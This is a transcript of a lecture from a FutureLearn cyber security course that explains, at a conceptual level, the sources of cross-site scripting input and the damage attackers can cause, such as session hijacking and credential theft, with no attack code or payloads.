Skip main navigation

Threat Analysis: What Damage Can Be Done by Targeting XSS?

In this video, Paulo Silva will explain more about how hackers target XSS and the damage they can do.
Let’s put things simply regarding XSS attack vectors. You just have to focus on user controlled data, regardless its source. URL parameters and form data may be the first things to come to your mind, but there’s a lot more. You should realize that users control the HTTP request, and so request headers and cookies may also be sources of hostile data. Browser’s local storage is another typical attack vector since malicious actors may be able to tamper with it. If your application expects file uploads such as photos, and then you’re reading the photo’s metadata, then it can also be used as an attack vector. Finally, a less obvious source of hostile data– external services.
If the application retrieves data from other services, for example, by means of APIs, malicious actors may decide to go after those third party services, indirectly compromising your application. Any data source is a potential attack vector. Keep in mind that attackers will be able to execute code remotely on victims’ browsers. The first thing attackers will look for is session tokens. If they can exfiltrate such token from a victim’s browser, chances are they will be able to use it in another browser to impersonate the victim. This is called session highjacking.
Even if session hijacking is not possible, attackers will be able to use JavaScript to automate tasks to scrape user data from the DOM or to do some actions on victim’s behalf, such as fraudulent transactions. Being able to execute code remotely in specific pages, such as the login page, may give attackers access to credentials. There are other techniques to trick the browser and password managers to leak credentials. Among other impacts, attackers will always be able to exploit the trust relationship between the victim and the website owner, driving the former to download and install malware. Technical skills are required to identify and exploit the cross site scripting vulnerability.
Nevertheless, there are automated tools to assist this task and plenty of information about the subject. Threat agents may be after specific victims. Targeting an application administrator may allow attackers to gain control over a privileged account and access sensitive data or shut down the system. On the other hand, attackers may be interested in a particular individual, let’s say a VIP. If your application manages sensitive data, such as health records, the XSS exploitation may give attackers access to sensitive information regarding that individual. XSS can also be used for widespread attacks. It happened already in the past, creating a worm effect.
To identify threats agents, consider who may wants to gain control over your application, and how sensitive is the information your application manages, and who may want to access it. You’ll find this table in the OWASP Top 10. Pause the video and take your time to carefully read it. In the next part, we will exploit XSS on our intentionally vulnerable application.

In this video, you will learn more about how hackers target XSS.

In the previous step, you learned what XSS is and then read the OWASP page on XSS. Now you will learn more about how hackers target XSS and the damage they can do.

This article is from the free online

Advanced Cyber Security Training: OWASP Top 10 and Web Application Fundamentals

Created by
FutureLearn - Learning For Life

Our purpose is to transform access to education.

We offer a diverse selection of courses from leading universities and cultural institutions from around the world. These are delivered one step at a time, and are accessible on mobile, tablet and desktop, so you can fit learning around your life.

We believe learning should be an enjoyable, social experience, so our courses offer the opportunity to discuss what you’re learning with others as you go, helping you make fresh discoveries and form new ideas.
You can unlock new opportunities with unlimited access to hundreds of online short courses for a year by subscribing to our Unlimited package. Build your knowledge with top universities and organisations.

Learn more about how FutureLearn is transforming access to education